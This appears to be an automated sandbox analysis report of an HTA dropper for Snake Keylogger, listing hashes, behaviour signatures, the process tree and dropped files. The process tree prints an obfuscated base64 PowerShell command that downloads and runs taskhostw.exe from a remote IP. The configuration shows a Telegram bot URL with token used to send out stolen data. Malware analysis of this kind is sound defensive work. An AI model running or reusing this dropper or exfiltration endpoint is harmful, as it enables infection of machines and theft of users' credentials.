Analysis
-
max time kernel
26s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
15-10-2024 07:25
General
-
Target
na.hta
-
Size
165KB
-
MD5
44ad3c49b38f4f6f1739baf86d528fd3
-
SHA1
afcf27df0ee2373846a1f6b8027e9cfcea77c486
-
SHA256
4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368
-
SHA512
e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691
-
SSDEEP
96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE"C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ac6mmqov.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93A9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9398.tmp"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5842a2cd40d2afde6753274320aaee40d
SHA150a2e76d8d3b53875a1cb998b6f9364154d79b4c
SHA256b433ae8d990d2b2f0a16f3d04f9d5d62fbb1e6376c0e0005aa0902bdb123f9d2
SHA512ad4c2ee74c25c371fd56e27f56d88e00f32579fef30f25c26f8b6e86b2ab07bb27d1217758f34f4fa8401a4978679f3031c43872a3330c688e3124a2662f67f7
-
Filesize
3KB
MD5269b1d8b5c51e06c0934aa60998398d5
SHA1ee4f2a747528994ecb8e84bffac3a747523e0ff2
SHA256c56dd7210e97727ae66c4fc7b17211477d67fa1201a0ca576ebf4f69b179878d
SHA51251e25c43550d3b3b56bac2ef15074fd4a766b527fa22da4818689152632e80054389033dfec203d909c4902dfe98d854d1497ba7e431d74302c4b5a0f3a31db3
-
Filesize
7KB
MD5d6062b696764ee80e39f589b829c15d5
SHA150aa26aea7afc2e820880d1d53c46f8d3533aba1
SHA256661c4e8d7bc901b8cf058834c79a948b828140bb443611e7678f4f9b5fd6450a
SHA512de0579500492904fb644c9f7a7ae107812377e4f86277ee04533d3edc3bac3cb8e2ce2af0d6e23533e49e846990a8c619d3aa834f911b5425d494dd98e9aa270
-
Filesize
7KB
MD5428c7683bfe1bb1472189fbea5d6d97c
SHA1d506aaa006ca31653954375383bd9579a7445c64
SHA256227aaf0627ebd198746c5ef490dadb6ed881470d639a00474354b9e7d9615839
SHA5127e9e1410912a2d4db203a9277711e1027da77ce8f4f6ca9db745c7ebfcfd2462d10d1e2dc4ed62484614d6aab9214bfe2fb7f68d5f5896d769cb1058457f3bb7
-
Filesize
948KB
MD53e2f27edd3deacd8f08f6ed1133b2040
SHA1060e3218949c5a006bb8607e8228e6539b737bfb
SHA256163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86
SHA512da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42
-
Filesize
652B
MD569a6829f5fc6fc9e8f06673022771307
SHA1873a9207ddff974fc14daafc94fbe57ca9a391dd
SHA256f5c7ed8fbb183aca02ae9346b4d1142e084fe3bbc2dc7946ac110d22586da4e2
SHA512ba5e55069d835506eb81e69629cb4ebf693359d32549a6601b88a3ac8e3e7e71f4df3e3225fc30cc2008da81aedd22349001f8b2867408b297dbc8bcb6bc4401
-
Filesize
475B
MD5ecc2c10cb4c5954e2d5156bce54e41f4
SHA12d7cde31f9942c1dc80c493c03d675962991bf31
SHA25621d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac
SHA512bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96
-
Filesize
309B
MD50ec20e30e8670b9913c1d0cbde22abd9
SHA11994992b86a3c627171b6877eeebd01b0a934259
SHA256602de832ffe2abc6c274b7f383086872e2efe54060542ba1595c0c6e1f00ed30
SHA5129aff4ebf239da9633ce7440f1ada2c70feab53310451fa465561d14140400b89612666269100e612d29f39e6997e69c33a90fd339f9080b85262de37d64081a7
-
Filesize
152KB
-
Filesize
152KB
-
Filesize
152KB